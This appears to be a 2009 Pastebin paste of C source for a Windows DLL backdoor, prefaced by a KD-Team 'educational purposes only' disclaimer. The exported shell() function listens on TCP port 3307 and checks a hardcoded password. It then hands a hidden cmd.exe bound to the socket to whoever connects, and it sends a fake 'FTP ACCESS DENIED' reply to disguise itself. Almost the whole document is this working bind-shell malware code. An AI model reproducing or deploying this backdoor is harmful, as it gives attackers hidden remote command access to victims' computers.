daily pastebin goal
84%
SHARE
TWEET

DiabloHorn

a guest Nov 9th, 2009 198 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  3. +This is a little Disclaimer for if you havn't read the one on our site.           +
  4. +The tools and tutorials KD-Team develops and publishes are only ment for          +
  5. +educational purpose only.WE DO NOT encourage the use of this tools and            +
  6. +tutorials for mailicious purpose.We learned a lot during the development of them  +
  7. +so we hope you also learn and don't just use it without any brains.               +
  8. +We take completly NO responsability for any damage caused by them nor             +
  9. +are we or our isp responsible for what you do with them.                          +
  10. +Greetz: KD-Team                                                                   +
  11. +http://www.kd-team.com                                                            +
  12. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  13. */
  14. #include <winsock2.h>
  15. #include <windows.h>
  16. #include <stdio.h>
  17. #include <stdlib.h>
  18.  
  19.  
  20. #define SERVPORT 3307
  21. #define RCVBUFSIZE 32
  22. #define PASSWORD "itworksihope"
  23.  
  24. extern "C" __declspec (dllexport) int shell()
  25. {
  26. //normal things for the socket setupt etc
  27.         WSADATA wsa;
  28.         SOCKET hSock;
  29.     SOCKET hLstnSock;
  30.         unsigned int ClientLen;
  31.         struct sockaddr_in ServAddr;
  32.         struct sockaddr_in ClientAddr;
  33.         STARTUPINFO si;
  34.         PROCESS_INFORMATION pi={0};
  35.         int BytesRcvd;
  36.         char *tok;
  37.         char echoBuffer[RCVBUFSIZE];
  38.         char comspec[MAX_PATH];
  39.  
  40. //setting up wsa
  41.         if(WSAStartup(MAKEWORD(2,0),&wsa) != 0)
  42.         {
  43.                 //printf("WSAStartup() failed\n");
  44.         }
  45.  
  46. //zeroing out the struct and filling it
  47.         memset(&ServAddr,0,sizeof(ServAddr));
  48.         ServAddr.sin_family = AF_INET;
  49.         ServAddr.sin_addr.s_addr = htonl(INADDR_ANY);
  50.         ServAddr.sin_port = htons(SERVPORT);
  51.  
  52. //making the socket NOTE it must be WSASocket else it won't pass the handle to the Process
  53.         if((hLstnSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,0,0,0)) < 0)
  54.         {
  55.                 //printf("socket() %d failed\n",WSAGetLastError());
  56.                 WSACleanup();
  57.         }
  58. //binding the listening socket.
  59.         if(bind(hLstnSock,(struct sockaddr *)&ServAddr,sizeof(ServAddr)) < 0)
  60.         {
  61.                 //printf("bind() %d failed\n",WSAGetLastError());
  62.                 closesocket(hLstnSock);
  63.         }
  64. //listening
  65.         if(listen(hLstnSock,1)< 0)
  66.         {
  67.                 //printf("listen() %d failed\n",WSAGetLastError());
  68.                 closesocket(hLstnSock);
  69.                 WSACleanup();
  70.         }
  71.  
  72. //the never ending loop :p
  73.         while(1)
  74.         {
  75.                 ClientLen = sizeof(ClientAddr);
  76. //accepting the incomming connection
  77.                 hSock = accept(hLstnSock, (struct sockaddr *)&ClientAddr, (int *)&ClientLen);
  78.                 if(hSock == INVALID_SOCKET)
  79.                 {
  80.                         break;
  81.                 }
  82.                 BytesRcvd =     recv(hSock, echoBuffer,RCVBUFSIZE -1,0);
  83.                 if(BytesRcvd > 0)
  84.                 {
  85. //this is the little authentication sequence
  86. //a strtok() is needed since -1 doens't always do what one wants.
  87.  
  88.                         tok = strtok(echoBuffer,"\n");
  89.                         if((strcmp(echoBuffer,PASSWORD))==0)
  90.                         {
  91.                                 //printf("Pass correct\n");
  92. //when succeeded the actual shell spawning happens.
  93.  
  94.                                 memset(&si,0,sizeof(si));
  95.                                 GetStartupInfo(&si);
  96. //setting the flags correct
  97.                                 si.cb = sizeof(si);
  98.                                 si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  99.                                 si.wShowWindow = SW_HIDE;
  100.                                 si.hStdInput = (HANDLE)hSock;
  101.                                 si.hStdOutput = (HANDLE)hSock;
  102.                                 si.hStdError =(HANDLE)hSock;
  103. //this is just handier then defining cmd.exe by hand.
  104.                                 if(GetEnvironmentVariable("COMSPEC", comspec, MAX_PATH) == 0)
  105.                                 {
  106.                                         //printf("Environment var failed\n");
  107.                                         break;
  108.                                 }
  109. //creating the process that will create the shell
  110.                                 if(!CreateProcess(NULL,comspec, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, 0, NULL, &si, &pi)) //CREATE_NO_WINDOW
  111.                                 {
  112.                                         //printf("process creation failed\n");
  113.                                         break;
  114.                                 }
  115. //waiting till finished
  116.                                 WaitForSingleObject(pi.hProcess, INFINITE);
  117. //little cleanup
  118.                                 CloseHandle(pi.hProcess);
  119.                                 CloseHandle(pi.hThread);
  120.                                 closesocket(hSock);
  121.                         }
  122.                         else
  123.                         {
  124. //if auth sequence failed well kick the bastard out.
  125.                                 //printf("incorrect pass\n");
  126.                                 send(hSock,"FTP ACCESS DENIED\n",strlen("FTP ACCESS DENIED\n"),0);
  127.                                 closesocket(hSock);
  128.                         }
  129.                 }
  130.  
  131.         }
  132.         closesocket(hLstnSock);
  133.         return 0;
  134. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top